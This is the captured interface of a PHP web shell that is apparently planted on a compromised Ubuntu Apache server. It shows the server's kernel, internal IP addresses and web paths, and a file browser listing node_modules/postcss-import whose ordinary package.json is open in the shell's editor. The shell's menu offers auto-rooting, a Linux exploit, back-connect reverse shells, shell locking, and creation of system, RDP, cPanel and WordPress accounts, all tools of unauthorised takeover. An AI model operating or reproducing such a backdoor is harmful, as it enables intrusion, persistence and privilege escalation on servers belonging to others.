Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
postcss-import /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
LICENSE
1.09
KB
-rwxrwxr-x
README.md
6.79
KB
-rw-rw-r--
index.js
12.88
KB
-rwxrwxr-x
package.json
1.25
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "postcss-import", "version": "15.1.0", "description": "PostCSS plugin to import CSS files", "keywords": [ "css", "postcss", "postcss-plugin", "import", "node modules", "npm" ], "author": "Maxime Thirouin", "license": "MIT", "repository": "https://github.com/postcss/postcss-import.git", "files": [ "index.js", "lib" ], "engines": { "node": ">=14.0.0" }, "dependencies": { "postcss-value-parser": "^4.0.0", "read-cache": "^1.0.0", "resolve": "^1.1.7" }, "devDependencies": { "ava": "^5.0.0", "eslint": "^8.2.0", "eslint-config-problems": "^7.0.0", "eslint-plugin-prettier": "^4.0.0", "postcss": "^8.0.0", "postcss-scss": "^4.0.0", "prettier": "~2.8.0", "sugarss": "^4.0.0" }, "peerDependencies": { "postcss": "^8.0.0" }, "scripts": { "ci": "eslint . && ava", "lint": "eslint . --fix", "pretest": "npm run lint", "test": "ava" }, "eslintConfig": { "extends": "eslint-config-problems", "env": { "node": true }, "plugins": [ "prettier" ], "rules": { "prettier/prettier": [ "error", { "semi": false, "arrowParens": "avoid" } ] } } }
Close